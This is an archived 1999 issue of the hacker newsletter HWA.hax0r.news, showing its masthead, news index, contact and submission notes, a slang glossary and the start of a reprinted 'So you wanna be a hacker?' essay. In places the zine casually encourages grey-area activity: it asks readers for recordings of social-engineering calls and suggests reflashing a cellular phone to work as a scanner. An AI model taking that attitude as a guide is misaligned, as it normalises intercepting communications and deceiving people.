💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn29.… captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 29 Volume 1 1999 Aug 14th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
Paraphrased irc nonsense I found amusing;
[16:00] *** Quits: wyze1 (Of course my password is my pets name!
My parrot's name was XzF!^lP, but I changed it to polly)
New mirror sites
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
For many, faith is a suitable substitute for knowledge,
as death is for a difficult life.
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #29
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #29
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. So you wanna be a hacker? by Avatar..............................
04.0 .. Microsoft vulnerability bulletin: Encapsulated SMTP address......
05.0 .. Disrupting Net Access a Cybercrime? .............................
06.0 .. IDEA CAST BO2K PLUGIN VULNERABILITY..............................
07.0 .. Mitnick gets a welcome birthday present from the LA DA...........
08.0 .. An Accurate Look At Mitnick's Life Behind Bars ..................
09.0 .. Sony and EA Take Down Paradigm ..................................
10.0 .. Regional Computer Forensics Lab Set Up in San Diego .............
11.0 .. University Sys Admin Faced with 10 Years for Using Too Much Bandwidth
12.0 .. Chaos Computer Camp Fun For All Last Weekend ....................
13.0 .. NIST Announces the AES Finalist Candidates ......................
14.0 .. Clinton Designates Group to Look At CyberCrime ..................
15.0 .. Taiwan Government Web Sites Defaced .............................
16.0 .. DoD Ordered to Change All Passwords .............................
17.0 .. Belgians Under Cyber Attack From One Man ........................
18.0 .. IRDP Hole in Win and Sol Leave Users Open to Attack..............
19.0 .. More Government Sites Defaced ...................................
20.0 .. Taiwan Strikes back at China via Net ............................
21.0 .. Monopoly Virus Taunts Bill Gates and Microsoft ..................
22.0 .. FBI Fingerprint database now online..............................
23.0 .. 45 Named as Enemies of the Internet .............................
24.0 .. Alliance Z3 Defaces Spanish Web Site ............................
25.0 .. Government has a Hard Time with Bureaucracy .....................
26.0 .. Law Not a Substitute for Good Security ..........................
27.0 .. Network-centric Warfare to be Used by Military ..................
28.0 .. Gateway plans for Amiga .........................................
29.0 .. Mitnick Moved to County Jail ....................................
30.0 .. The problem with ISP's and security sites........................
31.0 .. The Internet Auditing Project ...................................
32.0 .. TCS Web Page Defacer Pleads Guilty ..............................
33.0 .. Cybercrime On the Rise in Russia - First Offender Convicted .....
34.0 .. ToorCon Less Than One Month Away ................................
35.0 .. FRESHMEAT.NET BOUGHT.............................................
36.0 .. LINUXPPC CRACK-CONTEST FINISHED..................................
37.0 .. INFOSEEK HACKED..................................................
38.0 .. HACKERS, IT CONSULTANTS EMBRACE FREE SECURITY TOOL...............
39.0 .. TRINUX 0.62 RELEASED.............................................
40.0 .. GOVERNMENT FACES SECURITY SKILLS SHORTAGE........................
41.0 .. SOFTWARE REVERSE ENGINEERING ALLOWED IN AUSTRALIA................
42.0 .. IRELAND INTENDS TO CRIMINALIZE E-SIGNATURE FRAUD.................
43.0 .. ISRAEL AND PIRACY................................................
44,0 .. OUTSIDE HELP ISN'T WANTED .......................................
45.0 .. HACKER MYTHOLOGY.................................................
46.0 .. DEFAULT ISSUE #1.................................................
47.0 .. MICROSOFT AND AOL................................................
48.0 .. INTERVIEW WITH ERIC RAYMOND......................................
49.0 .. CODE-CRACKING COMPUTER CAUSES CONCERN............................
50.0 .. HACKING YOUR WAY TO AN IT CARREER................................
51.0 .. BALTIMORE TECHNOLOGIES TO SHIP ENCRYPTION TOOL FOR XML...........
52.0 .. STARTUP WANTS TO SELL UNTAPPABLE PHONES..........................
53.0 .. OUTSMARTING THE WILY COMPUTER VIRUS..............................
54.0 .. NEW MAIL ATTACK IDENTIFIED.......................................
55.0 .. ERROR IN MICROSOFT PATCH.........................................
56.0 .. NEW IE5 BUG EXPOSES PASSWORDS....................................
57.0 .. KEY TO CRYPTO SUCCESS: DON'T BE BORN IN THE USA..................
58.0 .. L0PHT IRDP ADVISORY..............................................
59.0 .. Stronger computers, easier encrypton, RSA coding.................
60.0 .. 'Security Police isn't doing enough'.............................
61.0 .. Hack attacks drive outsourced security...........................
62.0 .. Backdoors in Windows?............................................
63.0 .. The newbies guide to FUD (Fear Uncertainty and Doubt)............
64.0 .. Crashing AntiOnline's SMTP server?...............................
65.0 .. Rootshell.com review.............................................
66.0 .. The inevitability of failure.....................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA.. .................
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix
Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
& Kevin Mitnick (Happy Birthday)
kewl sites:
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*Thin pickings this week for news, but here we go with #29
*
*
* Remember to send in any articles you want to write to us!
* wether its technology, hacking, internet, or phreaking...
* also poetry and short cyberpunk stories will be considered
* for printing, use us as your distribution medium...
* send submissions to: hwa@press.usmc.net
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
03.0 So you wanna be a hacker? by Avatar
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
retro-text picked up off the web by - ed ...
http://dmatrix.teamshadow.com/hack/statemind.txt
So you wanna be a HACKER huh? <Bwahahaha!> It's a state-of-MIND!
..you can induce it - but only if you are willing to drive yourself
mad enough! Go read and practice until you have mastered at least
Assembly language and Intermediate Level Electronics! Without this
foundation you'll be just another little geek, who might know the magic
words to the spell but dosent understand what he's doing! So RTFM!
..so what does that mean? Read The Fucking Manual! You will be sooo
amazed at how easy most things are if you just try to read the manual
first! The truth is: Most people cant read. Or they read poorly if
they read at all. So if you can't really read...STOP RIGHT HERE. GO
learn to read first. If you can't read at a minimum 12th Grade level
you cant be a hacker. Reading is the basic skill you must have to do
EVERYTHING BEYOND THIS POINT.
Tell your friends you cant party...you're busy. Spend at least 4
hours a day at your new-found fascination...or decide right here
and now that you cant cut it! If you CAN, get a copy of MINIX or
LINUX...start learning about OPERATING SYSTEMS. Then start your
1st real hack...try building a computer-controlled, DTMF dialer
card for your cheap PC...write the code to use it with, make it
a TSR to keep life interesting...now port it to MINIX or whatever
...better yet, port it as an IOCTL call at kernel level! You keep
reading...
Now you're ready to take on something more complex - go to the
Library, start a literature search; topic: Telephone Technologies.
RTFM! Learm about the ancient cross-bar, the Pre-ESS systems, the
fab MFTSS, the TELEX boxes and circuits...keep reading...buy up
an older, cheap (like under $50) cellular phone...by this time
you should already have a subscription to 'Nuts & Volts" as well
as a few other grassroots technology pubs....buy a copy of the
"Cellular Hacker's Bible"....start by doing something simple..
..disassemble and re-write the phone`s control ROM to allow it
to function as an 800MHZ scanner...hopefully you've assembled
a large array of tools and test gear by now. You've got a good
dual-trace scope, some pc-based PROM burner, a signal generator,
a logic probe or two, maybe even a microprocessor-emulator for
the 5051, the Z80, the 68010 or something....you may have been
dragged into some fields-afar by life - incorporate them: If
somebody drasgged you into SCUBA, build your own sonar. If you
have gotten interested in amateur radio, you can build a lot
of swell stuff...I recommend you checkout Packet's AX25A level2
protocol...very slick stuff! If your bud's are all into motors,
take a whak at doing your own Performance PROMS for GM's F.I. and
spark advance curves...or try adapting some Volkswagen/BOSCHE
Kjetronics F.I. to a Harley Davidson!..maybe you're into music
